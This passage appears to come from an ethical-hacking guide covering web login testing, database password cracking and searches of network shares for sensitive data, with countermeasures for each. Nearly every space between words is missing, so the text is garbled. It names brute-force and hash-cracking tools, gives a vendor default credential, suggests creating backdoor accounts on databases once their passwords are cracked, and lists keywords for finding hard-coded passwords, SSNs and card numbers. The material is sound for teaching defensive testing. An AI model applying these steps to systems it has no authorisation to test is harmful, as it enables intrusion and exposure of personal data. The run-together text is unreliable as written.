GETrequestsareoftenstoredintheuser’swebbrowserhistoryfile,webserverlogfiles,andproxylogfiles.GETrequestscanbetransmittedtothird-partysitesviatheHTTPRefererfieldwhentheuserbrowsestoathird-partysite.Alloftheabovecanleadtoexposureoflogincredentialsandunauthorizedwebapplicationaccess.Thelesson:Don’tuseHTTPGETrequestsforlogins.UseHTTPPOSTrequestsinstead.Ifanything,considerthesevulnerabilitiestobeagoodreasontoencrypttheharddrivesofyourlaptopsandothercomputersthatarenotphysicallysecure!

DefaultscriptattacksPoorlywrittenwebprograms,suchasHypertextPreprocessor(PHP)andActiveServerPages(ASP)scripts,canallowhackerstoviewandmanipulatefilesonawebserveranddootherthingsthey’renotauthorizedtodo.Theseflawsarealsocommonincontentmanagementsystems(CMSs)thatareusedbydevelopers,ITstaff,andmarketingprofessionalstomaintainawebsite’scontent.Defaultscriptattacksarecommonbecausesomuchpoorlywrittencodeisfreelyaccessibleonwebsites.Hackerscanalsotakeadvantageofvarioussamplescriptsthatinstallonwebservers,especiallyolderversionsofMicrosoft’sIISwebserver.

Manywebdevelopersandwebmastersusethesescriptswithoutunderstandinghowtheyreallyworkorwithouttestingthem,whichcanintroduceserioussecurityvulnerabilities.

Totestforscriptvulnerabilities,youcanperusescriptsmanuallyoruseatextsearchtool(suchasthesearchfunctionbuiltintotheWindowsStartmenuortheFindprograminLinux)tofindanyhard-codedusernames,passwords,andothersensitiveinformation.Searchforadmin,root,user,ID,login,signon,password,pass,pwd,andsoon.Sensitiveinformationembeddedinscriptslikethisisrarelynecessaryandisoftentheresultofpoorcodingpracticesthatgiveprecedencetoconvenienceover

http://www.x-ways.net/winhex/

security.

CountermeasuresagainstdefaultscriptattacksYoucanhelppreventattacksagainstdefaultwebscriptsasfollows:

Knowhowscriptsworkbeforedeployingthemwithinawebenvironment.Makesurethatalldefaultorsamplescriptsareremovedfromthewebserverbeforeusingthem.

Keepanycontentmanagementsystemsoftwareupdated,especiallyWordPressasittendstobeabigtargetforattackers.

Don’tusepubliclyaccessiblescriptsthatcontainhard-codedconfidentialinformation.They’reasecurityincidentinthemaking.

Setfilepermissionsonsensitiveareasofyoursite/applicationtopreventpublicaccess.

UnsecuredloginmechanismsManywebsitesrequireuserstologinbeforetheycandoanythingwiththeapplication.Theseloginmechanismsoftendon’thandleincorrectuserIDsorpasswordsgracefully.TheyoftendivulgetoomuchinformationthatanattackercanusetogathervaliduserIDsandpasswords.

Totestforunsecuredloginmechanisms,browsetoyourapplicationandlogin

UsinganinvaliduserIDwithavalidpasswordUsingavaliduserIDwithaninvalidpasswordUsinganinvaliduserIDandinvalidpassword

Afteryouenterthisinformation,thewebapplicationwillprobablyrespondwithamessagesimilartoYouruserIDisinvalidorYourpasswordisinvalid.Thewebapplicationmightreturnagenericerrormessage,suchasYouruserIDandpasswordcombinationisinvalidand,atthesametime,returndifferenterrorcodesintheURLforinvaliduserIDsandinvalidpasswords,asshowninFigures15-7and15-8.

Figure15-7:URLreturnsanerrorwhenaninvaliduserIDisentered.

Figure15-8:TheURLreturnsadifferenterrorwhenaninvalidpasswordisentered.

Ineithercase,thisisbadnewsbecausetheapplicationistellingyounotonlywhichparameterisinvalid,butalsowhichoneisvalid.Thismeansthatmaliciousattackers

nowknowagoodusernameorpassword—theirworkloadhasbeencutinhalf!Iftheyknowtheusername(whichusuallyiseasiertoguess),theycansimplywriteascripttoautomatethepassword-crackingprocess,andviceversa.

Youshouldalsotakeyourlogintestingtothenextlevelbyusingaweblogincrackingtool,suchasBrutus(www.hoobie.net/brutus/index.html),asshowninFigure15-9.BrutusisaverysimpletoolthatcanbeusedtocrackbothHTTPandform-basedauthenticationmechanismsbyusingbothdictionaryandbrute-forceattacks.

Figure15-9:TheBrutustoolfortestingforweakweblogins.

Aswithanytypeofpasswordtesting,thiscanbealongandarduoustask,andyoustandtheriskoflockingoutuseraccounts.Proceedwithcaution.

Analternative—andbettermaintained—toolforcrackingwebpasswordsisTHC-Hydra(www.thc.org/thc-hydra)

Mostcommercialwebvulnerabilityscannershavedecentdictionary-basedwebpasswordcrackersbutnone(thatI’mawareof)candotruebrute-forcetestinglikeBrutuscan.AsIdiscussinChapter8,yourpassword-crackingsuccessishighlydependentonyourdictionarylists.Herearesomepopularsitesthathousedictionaryfilesandothermiscellaneouswordlists:


http://packetstormsecurity.org/Crackers/wordlists


http://www.hoobie.net/brutus/index.html



http://packetstormsecurity.org/Crackers/wordlists


AcunetixWebVulnerabilityScannerdoesagoodjobtestingforweakpasswordsduringitsscans.I’vesuccessfullyusedthisscannertouncoverweakwebpasswordsthatIwouldn’thavefoundotherwise.Suchafindingoftenleadstofurtherpenetrationofthesystem.

Youmightnotneedapassword-crackingtoolatallbecausemanyfront-endwebsystems,suchasstoragemanagementsystemsandIPvideoandphysicalaccesscontrolsystems,simplyhavethepasswordsthatcameonthem.Thesedefaultpasswordsareusually“password,”“admin,”ornothingatall.Somepasswordsareevenembeddedrightintheloginpage’ssourcecode,suchasthenetworkcamerasourcecodeshowninlines207and208inFigure15-10.

Figure15-10:Anetworkcamera’slogincredentialsembeddeddirectlyinitsHTMLsourcecode.

CountermeasuresagainstunsecuredloginsystemsYoucanimplementthefollowingcountermeasurestopreventpeoplefromattackingweakloginsystemsinyourwebapplications:

Anyloginerrorsthatarereturnedtotheendusershouldbeasgenericaspossible,sayingsomethingsimilartoYouruserIDandpasswordcombinationisinvalid.

TheapplicationshouldneverreturnerrorcodesintheURLthatdifferentiatebetweenaninvaliduserIDandaninvalidpassword.

IfaURLmessagemustbereturned,theapplicationshouldkeepitasgenericaspossible.Here’sanexample:

www.your_web_app.com/login.cgi?success=false

ThisURLmessagemightnotbeconvenienttotheuser,butithelpshidethemechanismandthebehind-the-scenesactionsfromtheattacker.

UseCAPTCHA(alsoreCAPTCHA)orwebloginformstohelppreventpassword-crackingattempts.Employanintruderlockoutmechanismonyourwebserverorwithinyourwebapplicationstolockuseraccountsafter10–15failedloginattempts.Thischorecanbehandledviasessiontrackingorviaathird-partywebapplicationfirewalladd-onlikeIdiscussinthelatersection“Puttingupfirewalls.”Checkforandchangeanyvendordefaultpasswordstosomethingthat’seasytorememberyetdifficulttocrack.

HackingWeb2.0Newerwebtechnologies,originallydubbed“Web2.0,”havechangedhowtheInternetisused.FromYouTubetoFacebooktoTwitter,newserverandclient-sidetechnologies,suchaswebservices,Ajax,andFlash,arebeingrolledoutasifthey’regoingoutofstyle.Andthesearen’tjustconsumertechnologies.Businessesseethevalueinthem,anddevelopersareexcitedtoutilizethelatestandgreatesttechnologiesintheirenvironments.

Unfortunately,thedownsidetothesetechnologiesiscomplexity.ThesenewrichInternetapplications,asthey’realsoreferredto,aresocomplexthatdevelopers,qualityassuranceanalysts,andsecuritymanagersarestrugglingtokeepupwithalltheirassociatedsecurityissues.Don’tgetmewrong;thevulnerabilitiesinnewerapplicationsareverysimilartowhatshowupwithlegacytechnologies,suchasXSS,SQLinjection,parametermanipulation,andsoon.Youhavetoremainvigilant.

Inthemeantime,herearesomevaluabletoolsyoucanusetotestforflawsinyourWeb2.0applications:

WebDeveloper(http://chrispederick.com/work/web-developer)foranalyzingscriptcodeandperformingothermanualchecks.

WSDigger(www.mcafee.com/us/downloads/free-tools/wsdigger.aspx)foranalyzingwebservices.

WSFuzzer(www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project)foranalyzingwebservices.

TechnologiessuchasAjaxandwebservicesareheretostay,sotrytogetyourarmsaroundtheirsecurityissuesnowbeforethetechnologygrowsevenmorecomplex.

PerforminggeneralsecurityscansforwebapplicationvulnerabilitiesIwanttoreiteratethatbothautomatedandmanualtestingneedtobeperformedagainstyourwebsystems.You’renotgoingtoseethewholepicturebyrelyingonjustoneofthesemethods.Ihighlyrecommendusinganall-in-onewebapplicationvulnerabilityscannersuchasAcunetixWebVulnerabilityScannerorAppSpidertohelpyourootoutwebvulnerabilitiesthatwouldbeunreasonableifnotimpossibletofindotherwise.CombinethescannerresultswithamaliciousmindsetandthehackingtechniquesIdescribeinthischapter,andyou’reonyourwaytofindingthewebsecurityflawsthatmatter.


http://www.mcafee.com/us/downloads/free-tools/wsdigger.aspx

http://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project

MinimizingWebSecurityRisksKeepingyourwebapplicationssecurerequiresongoingvigilanceinyourethicalhackingeffortsandonthepartofyourwebdevelopersandvendors.Keepupwiththelatesthacks,testingtools,andtechniquesandletyourdevelopersandvendorsknowthatsecurityneedstobeatoppriorityforyourorganization.Idiscussgettingsecuritybuy-ininChapter20.

Youcangaindirecthands-onexperiencetestingandhackingwebapplicationsbyusingthefollowingresources:

OWASPWebGoatProject(www.owasp.org/index.php/Category:OWASP_WebGoat_Project)Foundstone’sSASSHacmeTools(www.mcafee.com/us/downloads/free-tools/index.aspx)

Ihighlyrecommendedyoucheckthemoutandgetyourhandsdirty!

PracticingsecuritybyobscurityThefollowingformsofsecuritybyobscurity—hidingsomethingfromobviousviewusingtrivialmethods—canhelppreventautomatedattacksfromwormsorscriptsthatarehard-codedtoattackspecificscripttypesordefaultHTTPports:

Toprotectwebapplicationsandrelateddatabases,usedifferentmachinestoruneachwebserver,application,anddatabaseserver.

TheoperatingsystemsontheseindividualmachinesshouldbetestedforsecurityvulnerabilitiesandhardenedbasedonbestpracticesandthecountermeasuresdescribedinChapters12and13.

Usebuilt-inwebserversecurityfeaturestohandleaccesscontrolsandprocessisolation,suchastheapplication-isolationfeatureinIIS.Thispracticehelpsensurethatifonewebapplicationisattacked,itwon’tnecessarilyputanyotherapplicationsrunningonthesameserveratrisk.Useatoolforobscuringyourwebserver’sidentity—essentiallyanonymizingyourserver.AnexampleisPort80Software’sServerMask(www.port80software.com/products/servermask).Ifyou’rerunningaLinuxwebserver,useaprogramsuchasIPPersonality(http://ippersonality.sourceforge.net)tochangetheOSfingerprintsothesystemlookslikeit’srunningsomethingelse.

http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

http://www.mcafee.com/us/downloads/free-tools/index.aspx

http://www.port80software.com/products/servermask/

http://ippersonality.sourceforge.net/

Changeyourwebapplicationtorunonanonstandardport.ChangefromthedefaultHTTPport80orHTTPSport443toahighportnumber,suchas8877,and,ifpossible,settheservertorunasanunprivilegeduser—thatis,somethingotherthansystem,administrator,root,andsoon.

Nevereverrelyonobscurityalone;itisn’tfoolproof.Adedicatedattackermightdeterminethatthesystemisn’twhatitclaimstobe.Still,evenwiththenaysayers,itcanbebetterthannothing.

PuttingupfirewallsConsiderusingadditionalcontrolstoprotectyourwebsystems,includingthefollowing:

Anetwork-basedfirewallorIPSthatcandetectandblockattacksagainstwebapplications.ThisincludescommercialfirewallsfromsuchcompaniesasWatchGuard(www.watchguard.com)andPaloAltoNetworks(www.paloaltonetworks.com)Ahost-basedwebapplicationIPS,suchasSecureIIS(www.eeye.com/products/secureiis-web-server-security)orServerDefender(www.port80software.com/products/serverdefender)oraWebApplicationFirewall(WAF)fromvendorssuchasBarracudaNetworks(www.barracuda.com/products/webapplicationfirewall)andFortiNet(www.fortinet.com/products/fortiweb/index.html)

Theseprogramscandetectwebapplicationandcertaindatabaseattacksinrealtimeandcutthemoffbeforetheyhaveachancetodoanyharm.

AnalyzingsourcecodeSoftwaredevelopmentiswheremanysoftwaresecurityholesbeginandshouldendbutrarelydo.Ifyoufeelconfidentinyoursecuritytestingeffortstothispoint,youcandigdeepertofindsecurityflawsinyoursourcecode—thingsthatmightneverbediscoveredbytraditionalscannersandhackingtechniquesbutthatareproblemsnonetheless.Fearnot!It’sactuallymuchsimplerthanitsounds.No,youwon’thavetogothroughthecodelinebylinetoseewhat’shappening.Youdon’tevenneeddevelopmentexperience(althoughitdoeshelp).

Todothis,youcanuseastaticsourcecodeanalysistool,suchasthoseofferedbyKlocwork(www.klocwork.com)andCheckmarx(www.checkmarx.com).Checkmarx’sCxSuiteisastandalonetoolthat’sreasonablypricedandverycomprehensiveinitstestingofbothwebapplicationsandmobileapps—somethingthat’shardtofindamongsourcecodeanalysisvendors.

AsshowninFigure15-11,withCxSuite,yousimplyloadtheEnterpriseClient,login

http://www.watchguard.com

http://www.paloaltonetworks.com

http://www.eeye.com/products/secureiis-web-server-security/

http://www.port80software.com/products/serverdefender/

https://www.barracuda.com/products/webapplicationfirewall

http://www.fortinet.com/products/fortiweb/index.html

http://www.klocwork.com

http://www.checkmarx.com/

totheapplication(defaultcredentialsareadmin@cx/admin),runtheCreateScanWizardtopointittothesourcecodeandselectyourscanpolicy,clickNext,clickRun,andyou’reoffandrunning.

Figure15-11:UsingCxSuitetodoananalysisofanopensourceAndroidmobileapp.

Whenthescancompletes,youcanreviewthefindingsandrecommendedsolutions,asshowninFigure15-12.

Figure15-12:ReviewingtheresultsofanopensourceAndroide-mailapp.

Asyoucansee,whatwasseeminglyasafeandsecuree-mailappdoesn’tappeartobeallthat.Youneverknowuntilyoucheckthesourcecode!

CxDeveloperisprettymuchallyouneedtoanalyzeandreportonvulnerabilitiesinyourC#,Java,andmobilesourcecodebundledintoonesimplepackage.Checkmarx,likeafewothers,alsooffersacloud-basedsourcecodeanalysisservice.Ifyoucangetoveranyhurdlesassociatedwithuploadingyoursourcecodetoathirdpartyinthecloud,thesecanofferamoreefficientandmostlyhands-freeoptionforsourcecodeanalysis.

Sourcecodeanalysiswilloftenuncoverdifferentflawsthantraditionalwebandmobilesecuritytesting.Ifyouwantthemostcomprehensiveleveloftesting,doboth.Theextralevelofchecksofferedbysourceanalysisisbecomingmoreandmoreimportantwithmobileapps.Theseappsareoftenfullofsecurityholesthatmanynewersoftwaredevelopersdidn’tlearnaboutinschool.IcoveradditionalmobileflawsinChapter11.

Thebottomlinewithwebapplicationandmobileappsecurityisthatifyoucanshowyourdevelopersandqualityassuranceanalyststhatsecuritybeginswiththem,youcanreallymakeadifferenceinyourorganization’soverallinformationsecurity.

UncoveringMobileAppFlawsInadditiontorunningatoolsuchasCxSuitetocheckformobileappvulnerabilities,thereareseveralotherthingsyou’llwanttolookforincluding:

Cryptographicdatabasekeysthatarehard-codedintotheappImproperhandlingofsensitiveinformationsuchasstoringpersonally-identifiableinformation(a.k.a.PII)locallywheretheuserandotherappscanaccessitLoginweaknesses,suchasbeingabletogetaroundloginpromptsAllowingweak,orblank,passwords

Notethatthesechecksaremostlyuncoveredviamanualanalysisandmayrequiretoolssuchaswirelessnetworkanalyzers,forensicstools,andwebproxiesthatItalkaboutinChapter9andChapter11,respectively.AswithIoT,theimportantthingisthatyou’retestingthesecurityofyourmobileapps.Betterforyoutofindtheflawsthanforsomeoneelse!

Chapter16

DatabasesandStorageSystemsInThisChapter

Testingandexploitingdatabaseflaws

Findingstorageweaknesses

Ferretingoutsensitiveinformation

Counteringdatabaseandstorageabuse

Attacksagainstdatabasesandstoragesystemscanbeveryseriousbecausethat’swhere“thegoods”arelocated,andthosewithillintentarewellawareofthat.TheseattackscanoccuracrosstheInternetorontheinternalnetworkwhenexternalattackersandmaliciousinsidersexploitanynumberofvulnerabilities.TheseattackscanalsooccurviathewebapplicationthroughSQLinjection.

DivingIntoDatabasesDatabasesystems,suchasMicrosoftSQLServer,MySQL,andOracle,havelurkedbehindthescenes,buttheirvalueandtheirvulnerabilitieshavefinallycometotheforefront.Yes,eventhemightyOraclethatwasonceclaimedtobeunhackableissusceptibletoexploitssimilartoitscompetition.Withtheslewofregulatoryrequirementsgoverningdatabasesecurity,hardlyanybusinesscanhidefromtherisksthatliewithinbecausepracticallyeverybusiness(largeandsmall)usessomesortofdatabaseeitherin-houseorhostedinthecloud.

ChoosingtoolsAswithwirelessnetworks,operatingsystems,andsoon,youneedgoodtoolsifyou’regoingtofindthedatabasesecurityissuesthatcount.Thefollowingaremyfavoritetoolsfortestingdatabasesecurity:

AdvancedSQLPasswordRecovery(www.elcomsoft.com/asqlpr.html)forcrackingMicrosoftSQLServerpasswordsCain&Abel(www.oxid.it/cain.html)forcrackingdatabasepasswordhashesNexpose(www.rapid7.com/products/nexpose)forperformingin-depthvulnerabilityscansSQLPing3(www.sqlsecurity.com/downloads)forlocatingMicrosoftSQLServersonthenetwork,checkingforblankpasswordsforthe‘sa’account(thedefaultSQLServersystemadministrator),andperformingdictionarypassword-crackingattacks

Youcanalsouseexploittools,suchasMetasploit,foryourdatabasetesting.

FindingdatabasesonthenetworkThefirststepindiscoveringdatabasevulnerabilitiesistofigureoutwherethey’relocatedonyournetwork.Itsoundsfunny,butmanynetworkadminsI’vemetaren’tevenawareofvariousdatabasesrunningintheirenvironments.ThisisespeciallytrueforthefreeSQLServerExpressdatabasesoftwareeditionsthatanyonecandownloadandrunonyournetwork.

Ican’ttellyouhowoftenIfindsensitiveproductiondata,suchascreditcardandSocialSecuritynumbers,beingusedintestdatabasesthatarecompletelywideopentoabusebycuriousinsidersorevenexternalattackersthathavemadetheirwayintothenetwork.Usingsensitiveproductiondataintheuncontrolledareasofthenetworksuchassales,softwaredevelopment,andqualityassurance(QA)isadatabreachwaitingtohappen.

http://www.elcomsoft.com/asqlpr.html



http://www.sqlsecurity.com/downloads

ThebesttoolI’vefoundtodiscoverMicrosoftSQLServersystemsisSQLPing3,whichisshowninFigure16-1.

Figure16-1:SQLPing3canfindSQLServersystemsandcheckformissingsaaccountpasswords.

SQLPing3canevendiscoverinstancesofSQLServerhiddenbehindpersonalfirewalls,suchasWindowsFirewall.ThisisanicefeatureasWindowsFirewallisenabledbydefaultonWindows7andup.

IfyouhaveOracleinyourenvironment,PeteFinniganhasagreatlistofOracle-centricsecuritytoolsatwww.petefinnigan.com/tools.htmthatcanperformfunctionssimilartoSQLPing3.

CrackingdatabasepasswordsSQLPing3alsoservesasanicedictionary-basedSQLServerpassword-crackingprogram.AsyousawinFigure16-1,itchecksforblanksapasswordsbydefault.AnotherfreetoolforcrackingSQLServer,MySQL,andOraclepasswordhashesisCain&Abel,showninFigure16-2.

http://www.petefinnigan.com/tools.htm

Figure16-2:UsingCain&AbeltocrackOraclepasswordhashes.

YousimplyloadCain&Abel,clicktheCrackertabatthetop,selectOracleHashesatthebottomleft,andclicktheblueplussymbolatthetoptoloadausernameandpasswordhashtostartthecracking.YoucanalsoselectOracleTNSHashesatthebottomleftandattempttocaptureTransportNetworkSubstratehashesoffthewirewhencapturingpacketswithCain.YoucandothesameforMySQLpasswordhashes.

ThecommercialproductElcomSoftDistributedPasswordRecovery(www.elcomsoft.com/edpr.html)canalsocrackOraclepasswordhashes.IfyouhaveaccesstoSQLServermaster.mdffiles(whichareoftenreadilyavailableonthenetworkduetoweakshareandfilepermissionsasIoutlinelaterinthischapter),youcanuseElcomSoft’sAdvancedSQLPasswordRecovery(www.elcomsoft.com/asqlpr.html)torecoverdatabasepasswordsimmediately.

YoumightstumbleacrosssomelegacyMicrosoftAccessdatabasefilesthatarepasswordprotectedaswell.Noworries:ThetoolAdvancedOfficePasswordRecovery(www.elcomsoft.com/acpr.html)cangetyourightin.

Asyoucanimagine,thesepassword-crackingtoolsareagreatwaytodemonstratethemostbasicofweaknessesinyourdatabasesecurity.It’salsoanicewaytounderscoretheproblemswithcriticalfilesscatteredacrossthenetworkinanunprotectedfashion.

AnothergoodwaytodemonstrateSQLServerweaknessesistouseMicrosoftSQLServer2008ManagementStudioExpress(www.microsoft.com/en-us/download/details.aspx?id=7593)toconnecttothedatabasesystemsyounowhavethepasswordsforandsetupbackdooraccountsorbrowsearoundtosee(andshow)what’savailable.InpracticallyeveryunprotectedSQLServersystemIcome

http://www.elcomsoft.com/edpr.html

http://www.elcomsoft.com/asqlpr.html

http://www.elcomsoft.com/acpr.html

http://www.microsoft.com/en-us/download/details.aspx?id=7593

across,there’ssensitivepersonalfinancialorhealthcareinformationavailableforthetaking.

ScanningdatabasesforvulnerabilitiesAswithoperatingsystemsandwebapplications,somedatabase-specificvulnerabilitiescanberootedoutonlybyusingtherighttools.IuseNexposetofindsuchissuesas:

BufferoverflowsPrivilegeescalationsPasswordhashesaccessiblethroughdefault/unprotectedaccountsWeakauthenticationmethodsenabled

Agreatall-in-onecommercialdatabasevulnerabilityscannerforperformingin-depthdatabasechecks—includinguserrightsauditsonSQLServer,Oracle,andsoon—isAppDetectivePRO(www.trustwave.com/Products/Database-Security/AppDetectivePRO).AppDetectivePROcanbeagoodadditiontoyoursecuritytestingtoolarsenalifyoucanjustifytheinvestment.

Manyvulnerabilitiescanbetestedfrombothanunauthenticatedoutsider’sperspectiveaswellasatrustedinsider’sperspective.Theimportantthingistoreviewthesecurityofyourdatabasesfromasmanyanglesasreasonablypossible.AsI’vesaidbefore,ifit’soutthereandaccessible,peoplearegoingtoplaywithit.

https://www.trustwave.com/Products/Database-Security/AppDetectivePRO/

FollowingBestPracticesforMinimizingDatabaseSecurityRisks

Keepingyourdatabasessecureisactuallyprettysimpleifyoudothefollowing:

Runyourdatabasesondedicatedservers(orworkstations,wherenecessary).Checktheunderlyingoperatingsystemsforsecurityvulnerabilities.IcoveroperatingsystemexploitsforWindowsandLinuxinChapters12and13,respectively.Ensurethatyourdatabasesfallwithinthescopeofpatchingandsystemhardening.Requirestrongpasswordsoneverydatabasesystem.Mostenterprise-readydatabasessuchasOracleandSQLServerallowyoutousedomainauthentication(suchasActiveDirectoryorLDAP)soyoucanjusttie-inyourexistingdomainpolicyanduseraccountsandnothavetoworryaboutmanagingaseparateset.Useappropriatefileandsharepermissionstokeeppryingeyesaway.De-identifyanysensitiveproductiondatabeforeit’susedinnon-productionenvironmentssuchasdevelopmentorQA.CheckyourwebapplicationsforSQLinjectionandrelatedinputvalidationvulnerabilities.(IcoverwebapplicationsecurityinChapter15.)Useanetworkfirewall,suchasthoseavailablefromFortinet(www.fortinet.com)orCisco(www.cisco.com),anddatabase-specificcontrols,suchasthoseavailablefromImperva(www.imperva.com)andIdera(www.idera.com).PerformrelateddatabasehardeningandmanagementusingatoolsuchasMicrosoftSecurityComplianceManager(http://technet.microsoft.com/en-us/library/cc677002.aspx).Runthelatestversionofdatabaseserversoftware.ThenewsecurityfeaturesinSQLServer2012andSQLServer2016aregreatadvancementstowardbetterdatabasesecurity.

http://www.fortinet.com

http://www.cisco.com

http://www.imperva.com

http://www.idera.com

http://technet.microsoft.com/en-us/library/cc677002.aspx

OpeningUpAboutStorageSystemsAttackersarecarryingoutagrowingnumberofstorage-relatedhacksandusevariousattackvectorsandtoolstobreakintothestorageenvironment.(SurelyyouknowwhatI’mgoingtosaynext.)Therefore,youneedtogettoknowthetechniquesandtoolsyourselfandusethemtotestyourownstorageenvironment.

TherearealotofmisconceptionsandmythsrelatedtothesecurityofsuchstoragesystemsasFibreChannelandiSCSIStorageAreaNetworks(SANs),CIFSandNFS-basedNetworkAttachedStorage(NAS)systems,andsoon.Manynetworkandstorageadministratorsbelievethat“EncryptionorRAIDequalsstoragesecurity,”“Anexternalattackercan’treachourstorageenvironment,”“Oursystemsareresilient,”or“Securityishandledelsewhere.”Theseareallverydangerousbeliefs,andI’mconfidentthatmoreattackswilltargetcriticalstoragesystems.

Aswithdatabases,practicallyeverybusinesshassomesortofnetworkstoragehousingsensitiveinformationthatitcan’taffordtolose.That’swhyit’simportanttoincludebothnetworkstorage(SANandNASsystems)andtraditionalfilesharesinthescopeofyoursecuritytesting.

ChoosingtoolsThesearemyfavoritetoolsfortestingstoragesecurity:

nmap(http://nmap.org)forportscanningtofindlivestoragehostsSoftPerfectNetworkScanner(www.softperfect.com/products/networkscanner)forfindingopenandunprotectedsharesFileLocatorPro(www.mythicsoft.com)Nexposeforperformingin-depthvulnerabilityscans

FindingstoragesystemsonthenetworkToseekoutstorage-relatedvulnerabilities,youhavetofirstfigureoutwhat’swhere.Thebestwaytogetrollingistouseaportscannerand,ideally,anall-in-onevulnerabilityscanner,suchasNexposeorLanGuard.Also,giventhatmanystorageservershavewebserversbuiltin,youcanusesuchtoolsasAcunetixWebVulnerabilityScannerandNetsparkertouncoverweb-basedflaws.Youcanusethesevulnerabilityscannerstogaingoodinsightintoareasthatneedfurtherinspection,suchasweakauthentication,unpatchedoperatingsystems,cross-sitescripting,andsoon.

http://nmap.org/


http://www.mythicsoft.com/

Acommonlyoverlookedstoragevulnerabilityisthatmanystoragesystemscanbeaccessedfromboththede-militarizedzone(DMZ)segmentandtheinternalnetworksegment(s).Thisvulnerabilityposesriskstobothsidesofthenetwork.BesuretomanuallychecktoseeifyoucanreachtheDMZfromtheinternalnetworkandviceversa.

Youcanalsoperformbasicfilepermissionandsharescans(asoutlinedinChapter12)inconjunctionwithatextsearchtooltouncoversensitiveinformationthateveryoneonthenetworkshouldnothaveaccessto.Diggingdownfurther,aquickmeansforfindingopennetworksharesistouseSoftPerfectNetworkScanner’ssharescanningcapabilitiesasshowninFigure16-3.

Figure16-3:UsingSoftPerfectNetworkScannertosearchfornetworkshares.

AsyoucanseeinFigure16-3,NetworkScannerenablesyoutoperformasecurityandsecuritypermissionscanforalldevicesorsimplyfolders.IrecommendselectingSpecificaccountintheAuthenticationsectionshowninFigure16-3andthenclickManagesoyoucanenteradomainaccountforthenetworkthathasgeneraluserpermissions.Thiswillprovideagoodlevelofaccesstodeterminewhichsharesareaccessible.

OnceNetworkScannerhascompleteditsscan,thesharesshowingEveryoneintheSharedFolderSecuritycolumnpointsyoutothesharesthatneedattention.HardlyasecurityassessmentgoesbywithoutcomingacrosssuchsharesopentotheWindowsEveryonegroup.Justascommonistoseethedirectoriesandfileswithintheseshares

thatarealsobeaccessibletoanylogged-inWindowsusertoopen,modify,delete—whatevertheyplease.How’sthatforaccountability!?

RootingoutsensitivetextinnetworkfilesOnceyoufindopennetworkshares,you’llthenwanttoscanforsensitiveinformationstoredinfilessuchasPDFs,.docx,and.xlsxfiles.It’sassimpleasusingatextsearchutility,suchasFileLocatorProorEffectiveFileSearch(www.sowsoft.com/search.htm).Alternatively,youcanuseWindowsExplorerorthefindcommandinLinuxtoscanforsensitiveinformation,butit’sjusttooslowandcumbersomeformyliking.

You’llbeamazedatwhatyoucomeacrossstoredinsecurelyonusers’desktops,servershares,andmore,suchas:

EmployeehealthrecordsCustomercreditcardnumbersCorporatefinancialreportsSourcecodeMasterdatabasefiles(asImentionedearlier)

Thesky’sthelimit.Suchsensitiveinformationshouldnotonlybeprotectedbygoodbusinesspractices,butisalsogovernedbystate,federal,andinternationalregulationsseehavetomakesurethatyoufinditandsecureit.

Doyoursearchesforsensitivetextwhileyou’reloggedintothelocalsystemordomainasaregularuser—notasanadministrator.Thiswillgiveyouabetterviewofregularuserswhohaveunauthorizedaccesstosensitivefilesandsharesthatyouthoughtwereotherwisesecure.Whenusingabasictextsearchtool,suchasFileLocatorPro,lookforthefollowingtextstrings:

DOB(fordatesofbirth)SSN(forSocialSecuritynumbers)License(fordriver’slicenseinformation)CreditorCCV(forcreditcardnumbers)

Don’tforgetaboutyourmobiledeviceswhenseekingsensitive,unprotectedinformation.EverythingfromlaptopstoUSBdrivestoexternalharddrivesisfairgametothebadguys.Amisplacedorstolensystemisallittakestocreateacostlydatabreach.

http://www.sowsoft.com/search.htm

Thepossibilitiesforinformationexposureareendless;juststartwiththebasicsandonlypeekintocommonfilesthatyouknowmighthavesomejuicyinfointhem.Limitingyoursearchtothesefileswillsaveyouatonoftime!

.txt

.docand.docx

.rtf

.xlsand.xlsx

.pdf

AnexampleofabasictextsearchusingFileLocatorProisshowninFigure16-4.Notethefilesfoundindifferentlocationsontheserver.

Figure16-4:UsingFileLocatorProtosearchforsensitivetextonunprotectedshares.

FileLocatorProalsohastheabilitytosearchforcontentinsidePDFfilestouncoversensitivedata.

Tospeedtheprocess,youcanuseSensitiveDataManager,areallyneattooldesignedfortheverypurposeofscanningstoragedevicesforsensitive,personallyidentifiableinformation.ItcanalsosearchinsidebinaryfilessuchasPDFs.

Forasecondroundoftesting,youcouldperformyoursearchesloggedinasanadministrator.You’relikelytofindalotofsensitiveinformationscatteredabout.Itmightseemworthlessatfirst;however,thiscanhighlightsensitiveinformationstoredinplacesitshouldn’tbeorthatnetworkadministratorsshouldn’thaveaccessto.

Testingishighlydependentontiming,searchingfortherightkeywords,andlookingattherightsystemsonthenetwork.Youlikelywon’trootouteverysinglebitofsensitiveinformation,butthiseffortwillshowyouwherecertainproblemsare,whichwillhelpyoutojustifytheneedforstrongeraccesscontrolsandbetterITandsecuritymanagementprocesses.

FollowingBestPracticesforMinimizingStorageSecurityRisks

Likedatabasesecurity,storagesecurityisnotbrainsurgery.Keepingyourstoragesystemssecureisalsosimpleifyoudothefollowing:

Checktheunderlyingoperatingsystemsforsecurityvulnerabilities.IcoveroperatingsystemexploitsforWindowsandLinuxinChapters12and13.Ensurethatyournetworkstorage(SANandNASsystems)fallswithinthescopeofpatchingandsystemhardening.Requirestrongpasswordsoneverystoragemanagementinterface.Useappropriatefileandsharepermissionstokeeppryingeyesaway.Educateyourusersonwheretostoresensitiveinformationandtherisksofmishandlingit.De-identifyanysensitiveproductiondatabeforeit’susedindevelopmentorQA.Therearetoolsmadeforthisspecificpurpose.Useanetworkfirewall,suchasthoseavailablefromFortinet(www.fortinet.com)orWatchGuardTechnologies(www.watchguard.com)toensureonlythepeopleandsystemsthatneedtoaccessyourstorageenvironmentcandosoandnothingmore.

http://www.fortinet.com

http://www.watchguard.com

PartVI

SecurityTestingAftermath

FivePiecesofInformationEverySecurityReportMustHave

Date(s)thetestingwasperformedTeststhatwereperformedSummaryofthevulnerabilitiesdiscoveredPrioritizedlistofvulnerabilitiesthatneedtobeaddressedRecommendationsandspecificstepsonhowtoplugthesecurityholesfound

Learnhowtokeepupyoursecuritytestingmomentumatwww.dummies.com/extras/hacking.


Inthispart…Nowthatthehard—oratleasttechnical—stuffisoverwith,it’stimetopulleverythingtogether,fixwhat’sbroken,andestablishgoodinformationsecuritypracticestohelpyoumoveforward.

